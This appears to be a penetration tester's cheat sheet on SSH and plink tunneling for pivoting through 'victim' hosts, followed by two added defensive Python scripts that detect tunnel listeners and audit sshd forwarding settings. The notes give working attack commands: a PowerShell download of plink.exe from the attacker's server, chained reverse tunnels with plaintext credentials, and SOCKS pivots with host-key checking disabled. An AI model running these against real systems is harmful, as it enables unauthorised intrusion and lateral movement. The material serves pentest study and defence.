Tunneling / (with SSH key)
Burp -> proxychains -> app: configure the SOCKS proxy in Burp under Settings > Network > Connections > SOCKS Proxy (point it at the proxychains/ssh -D SOCKS listener)
sudo netstat -tulpn #list listening ports with owning process, to check which tunnel endpoints are open
plink: reverse SSH tunnel from the victim to kali
#victim
netstat -ano #to see local-only services that nmap could not discover from outside
#kali
python -m http.server 8080 #to host plink
service ssh start
#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')
cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158 #echo y answers the host key prompt
#kali
nmap -sT -sV -sC -p 7799 127.0.0.1
:445 = the victim's local (internal) service ; 127.0.0.1:7799 on kali = tunnel listener that forwards to the victim's :445
#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9
#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158
tunnels machine C :9050 to kali :7799 through machine B :1069 (two chained -R forwards; each hop needs SSH credentials for the next hop)
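The netstat check at the top of these notes is the defender's view of the -L/-D/-R listeners set up in the plink sections above. The following is an added example (not code from the original notes): it parses the text of `sudo netstat -tulpn`, keeps the listeners owned by an ssh client, an sshd session or plink, and flags those bound to a non-loopback address, which is what GatewayPorts permits on the sshd side. The sample output, the TUNNEL_PROGRAMS set and the assumption that sshd's own service port is 22 are constructed for the example.

```python
"""
Spot SSH port-forward listeners in `netstat -tulpn` output.

Added defender-side example; not code from the original notes. Client-side
forwards (-L/-D) show up as listeners owned by `ssh` (or plink), server-side
forwards (-R) as listeners owned by the `sshd` session process.
"""
import re

# Programs whose listeners are tunnel endpoints (assumption: extend for your environment).
TUNNEL_PROGRAMS = {"ssh", "sshd", "plink"}
# Ports sshd listens on for the service itself; any other sshd listener is a -R endpoint.
SSHD_SERVICE_PORTS = {22}
LOOPBACK = {"127.0.0.1", "::1"}

# Constructed sample, modelled on the tunnels in the notes above.
SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd: /usr/sbin
tcp        0      0 127.0.0.1:7799          0.0.0.0:*               LISTEN      4321/sshd: kali
tcp        0      0 0.0.0.0:1069            0.0.0.0:*               LISTEN      4322/sshd: b.user
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      4400/ssh
tcp6       0      0 :::8080                 :::*                    LISTEN      1000/python3
udp        0      0 0.0.0.0:68              0.0.0.0:*                           600/dhclient
"""


def parse_netstat_tulpn(text):
    """Yield one dict per socket row; banner and header lines are skipped."""
    for line in text.splitlines():
        if not line.startswith(("tcp", "udp")):
            continue
        # TCP rows have a State column, UDP rows do not. The final column
        # (PID/Program name) can itself contain spaces, so cap the split.
        parts = line.split(None, 6 if line.startswith("tcp") else 5)
        if len(parts) < 6:
            continue  # truncated row
        bind, port = parts[3].rsplit(":", 1)  # rsplit keeps IPv6 ":::8080" intact
        m = re.match(r"(\d+)/(\S+)", parts[-1])  # column is "-" when run without privileges
        yield {
            "proto": parts[0],
            "bind": bind,
            "port": int(port),
            "pid": int(m.group(1)) if m else None,
            "program": m.group(2).rstrip(":") if m else None,  # "sshd: kali" -> "sshd"
        }


def find_tunnel_listeners(text):
    """Return the listeners that look like SSH forward endpoints."""
    findings = []
    for sock in parse_netstat_tulpn(text):
        prog = (sock["program"] or "").split(".")[0]  # "plink.exe" -> "plink"
        if prog not in TUNNEL_PROGRAMS:
            continue
        if prog == "sshd" and sock["port"] in SSHD_SERVICE_PORTS:
            continue  # the SSH service itself, not a forward
        sock["exposed"] = sock["bind"] not in LOOPBACK
        sock["kind"] = (
            "remote forward (-R) created by an inbound SSH session"
            if prog == "sshd"
            else "local/dynamic forward (-L/-D) of an outbound SSH client"
        )
        findings.append(sock)
    return findings


if __name__ == "__main__":
    for f in find_tunnel_listeners(SAMPLE):
        where = "EXPOSED on all interfaces" if f["exposed"] else "loopback only"
        print(f"{f['proto']} {f['bind']}:{f['port']} pid={f['pid']} ({f['program']}): {f['kind']}, {where}")
```

On the sample this reports 127.0.0.1:7799 and 0.0.0.0:1069 as -R endpoints of inbound sshd sessions (the second reachable from the network) and 127.0.0.1:9050 as a client-side forward; the sshd service port and the python/dhclient listeners are ignored. The program-name heuristic is only as good as the PID column, so run netstat as root, and on a Windows host (where the notes use `netstat -ano`) map the PID column to plink.exe yourself.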
ssh from kali to the victim (dynamic SOCKS forwarding, used through proxychains)
/etc/proxychains4.conf:
socks4 127.0.0.1 9050
socks4 127.0.0.1 9060
sudo ssh -N -D 127.0.0.1:9050 [email protected]
sudo ssh -N -D 127.0.0.1:9060 [email protected] -p 22000 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa #re-enables legacy algorithms for an old sshd
local forward: pivot machine :8888 to windows victim :3389 (needs the victim's password for RDP)
ssh -L 8888:192.168.1.90:3389 [email protected] #-f to background
(on the pivot machine, rdp to 127.0.0.1:8888)
from kali, connect to the pivot machine's :8888 to reach the final victim's :3389:
rdp 192.168.2.90:8888 #192.168.2.90 = pivot machine
note: -L binds to loopback by default; for the pivot's :8888 to be reachable from kali it must be bound with -g or as -L 0.0.0.0:8888:192.168.1.90:3389
ssh reverse forward from the 1st victim to kali
after finding which ports are open on the next client (10.5.5.11) from the 1st victim:
# bind next client :22 to kali 1122, next client 3306 to kali 13306
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa [email protected]
use a key (id_rsa) so ssh does not prompt for the kali password
# in /tmp on 1st victim
mkdir keys
cd keys
ssh-keygen -f /tmp/keys/id_rsa #same as answering the "Enter file in which to save the key" prompt with /tmp/keys/id_rsa
cat id_rsa.pub
copy the public key into kali ~/.ssh/authorized_keys
reverse dynamic port forwarding (SOCKS listener on kali, traffic exits through the 1st victim)
/etc/proxychains4.conf:
socks4 127.0.0.1 9050
ssh -f -N -R 9050 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa [email protected] #-R with only a port = reverse dynamic (SOCKS) forward, OpenSSH 7.6+ client
expose a windows victim's local-only :80 to other hosts
# afterwards 192.168.1.90:8080 reaches internalwww:80 (run from the victim)
ssh -R 8080:internalwww:80 [email protected]
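Every tunnel in these notes (plink -R, ssh -L, ssh -D, reverse dynamic -R) depends on the sshd on the receiving end permitting forwarding. As an added example (not code from the original notes), the following parses an sshd_config, applies OpenSSH's documented defaults for anything unset, and lists each forwarding-related keyword whose effective value still permits forwarding; a constructed weak config is compared with a constructed hardened one. It evaluates only the global section (directives inside Match blocks are ignored, an assumption that keeps the example short).

```python
"""
Check an sshd_config for the keywords that govern SSH port forwarding.

Added defender-side example, not code from the original notes. sshd uses the
first value it reads for a keyword, so the first occurrence wins here too.
WEAK_CONFIG and HARDENED_CONFIG are constructed for the example.
"""
import re

# keyword -> (OpenSSH default, value that fully blocks that forwarding type)
FORWARDING_KEYWORDS = {
    "allowtcpforwarding": ("yes", "no"),  # -L, -R and -D all need this
    "gatewayports": ("no", "no"),         # lets -R listeners bind beyond loopback
    "permitopen": ("any", "none"),        # destinations reachable via -L / -D
    "permitlisten": ("any", "none"),      # ports a client may ask sshd to listen on (-R)
    "permittunnel": ("no", "no"),         # tun(4) forwarding with -w
}

WEAK_CONFIG = """
# constructed: what the plink/ssh -R and -D tunnels in these notes rely on
Port 22
AllowTcpForwarding yes
GatewayPorts clientspecified
"""

HARDENED_CONFIG = """
# constructed: forwarding off globally, re-enabled narrowly for one group
Port 22
AllowTcpForwarding no
GatewayPorts no
PermitOpen none
PermitListen none
PermitTunnel no

Match Group tunnel-admins
    AllowTcpForwarding local
    PermitOpen 10.0.0.5:443
"""


def parse_sshd_config(text):
    """Return {keyword: first value} for the global section (stops at the first Match)."""
    values = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # sshd accepts "Key value" and "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        values.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return values


def forwarding_findings(text):
    """List (keyword, effective value, blocking value) for keywords that still allow forwarding."""
    values = parse_sshd_config(text)
    findings = []
    for key, (default, blocking) in FORWARDING_KEYWORDS.items():
        effective = values.get(key, default).lower()
        if effective != blocking:
            findings.append((key, effective, blocking))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {forwarding_findings(cfg) or 'no forwarding permitted globally'}")
```

The weak config yields four findings (AllowTcpForwarding, GatewayPorts, and the unset PermitOpen/PermitListen at their permissive defaults); the hardened one yields none, because the Match block that re-enables local forwarding for one group is outside the global section. A PermitOpen or PermitListen allowlist will also be reported, since it is not the fully blocking value; judge such findings in context rather than treating them as defects.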